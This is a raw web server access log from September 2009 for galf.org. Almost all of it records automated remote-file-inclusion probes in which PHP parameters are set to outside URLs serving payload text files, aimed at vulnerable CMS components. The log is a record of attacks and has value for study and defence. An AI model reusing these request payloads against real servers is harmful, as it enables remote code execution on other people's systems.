65.38.188.164 - - [06/Sep/2009:22:51:00 -0700] "GET /logs/access_090223.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:51:01 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:51:03 -0700] "GET /logs/access_090223.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.117.174 - - [06/Sep/2009:22:51:07 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
67.108.252.200 - - [06/Sep/2009:22:51:17 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:51:22 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.126.36.34 - - [06/Sep/2009:22:51:25 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.126.36.34 - - [06/Sep/2009:22:51:25 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
98.126.36.34 - - [06/Sep/2009:22:51:25 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:51:28 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.126.36.34 - - [06/Sep/2009:22:51:55 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:51:55 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 200 1034 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:51:55 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 200 4934 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:51:55 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.117.174 - - [06/Sep/2009:22:51:58 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:52:02 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 200 1034 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:52:02 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:52:02 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 200 4934 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:52:06 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.117.174 - - [06/Sep/2009:22:52:07 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:52:30 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.34.46.90 - - [06/Sep/2009:22:52:38 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:52:47 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:52:47 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:52:47 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:10 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:11 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:11 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:11 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:11 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:11 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:37 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.109.17.146 - - [06/Sep/2009:22:53:39 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:53:45 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:53:45 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 200 1034 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:53:49 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.0" 200 4934 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:53:59 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:54:11 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:54:12 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:54:15 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:54:16 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:54:16 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.235.194 - - [06/Sep/2009:22:54:16 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:54:19 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:22:54:19 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:22:54:19 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.235.194 - - [06/Sep/2009:22:54:45 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:56:25 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:22:56:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:22:56:25 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [06/Sep/2009:22:56:58 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:56:58 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:56:58 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:57:00 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:57:00 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:57:00 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:22:57:40 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:22:57:40 -0700] "GET /logs/access_090309.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:22:57:40 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:57:44 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [06/Sep/2009:22:57:49 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [06/Sep/2009:23:04:09 -0700] "GET /logs/access_090316.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [06/Sep/2009:23:07:45 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [06/Sep/2009:23:07:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [06/Sep/2009:23:07:45 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.110.11.75 - - [06/Sep/2009:23:10:40 -0700] "GET /logs/access_090216.log/?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.110.11.75 - - [06/Sep/2009:23:10:40 -0700] "GET /?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
211.110.11.75 - - [06/Sep/2009:23:10:40 -0700] "GET /logs/?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "www.galf.org"
65.55.106.115 - - [06/Sep/2009:23:11:24 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.115 - - [06/Sep/2009:23:12:05 -0700] "GET /logs/access_090406.log HTTP/1.0" 200 6881731 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.110.11.75 - - [06/Sep/2009:23:13:55 -0700] "GET /logs/access_090216.log/?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.110.11.75 - - [06/Sep/2009:23:13:55 -0700] "GET /logs/?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
211.110.11.75 - - [06/Sep/2009:23:13:55 -0700] "GET /?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.110.11.75 - - [06/Sep/2009:23:19:13 -0700] "GET /logs/access_090216.log%20%20/?page=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:33 -0700] "GET /bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:33 -0700] "GET /logs//bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:33 -0700] "GET /logs/access_090119.log%20%20//bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:43 -0700] "GET /logs//bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:43 -0700] "GET /logs/access_090119.log%20%20//bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:43 -0700] "GET /bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:45 -0700] "GET /bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:45 -0700] "GET /logs/access_090119.log%20%20//bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.186.117.226 - - [06/Sep/2009:23:20:45 -0700] "GET /logs//bbs//include/print_category.php?setup[use_category]=1&dir=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:23:16 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/yes.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:23:17 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
209.172.33.230 - - [06/Sep/2009:23:23:17 -0700] "GET /logs/access_090413.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.hinhdongphatgiao.org/dulieuweb/upload/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
66.40.25.236 - - [06/Sep/2009:23:23:20 -0700] "GET /skin/zero_vote/setup.php?dir=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.40.25.236 - - [06/Sep/2009:23:23:30 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.40.25.236 - - [06/Sep/2009:23:23:30 -0700] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [06/Sep/2009:23:24:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://carepartnersplusinternational.org//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:23:24:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://carepartnersplusinternational.org//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:23:24:59 -0700] "GET /logs/access_090518.log/modules/My_eGallery/index.php?basepath=http://carepartnersplusinternational.org//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.85.104 - - [06/Sep/2009:23:25:04 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://carepartnersplusinternational.org//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
74.50.85.104 - - [06/Sep/2009:23:25:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://carepartnersplusinternational.org//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
74.50.85.104 - - [06/Sep/2009:23:25:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://carepartnersplusinternational.org//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.139.66.104 - - [06/Sep/2009:23:25:20 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [06/Sep/2009:23:25:20 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [06/Sep/2009:23:25:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [06/Sep/2009:23:25:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [06/Sep/2009:23:25:25 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.139.66.104 - - [06/Sep/2009:23:25:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.189.2.39 - - [06/Sep/2009:23:26:09 -0700] "GET /skin/zero_vote/setup.php?dir=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.189.2.39 - - [06/Sep/2009:23:26:09 -0700] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.189.2.39 - - [06/Sep/2009:23:26:09 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:11 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:11 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:11 -0700] "GET /logs/access_090309.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:11 -0700] "GET /logs/access_090223.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:20 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:20 -0700] "GET /logs/access_090309.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:20 -0700] "GET /logs/access_090223.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [06/Sep/2009:23:26:20 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.18.236.8 - - [06/Sep/2009:23:27:30 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
63.249.95.132 - - [06/Sep/2009:23:31:37 -0700] "GET /logs/access_090720.log%20/big.php?pathtotemplate=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:23:31:37 -0700] "GET /big.php?pathtotemplate=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:23:31:37 -0700] "GET /logs/big.php?pathtotemplate=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
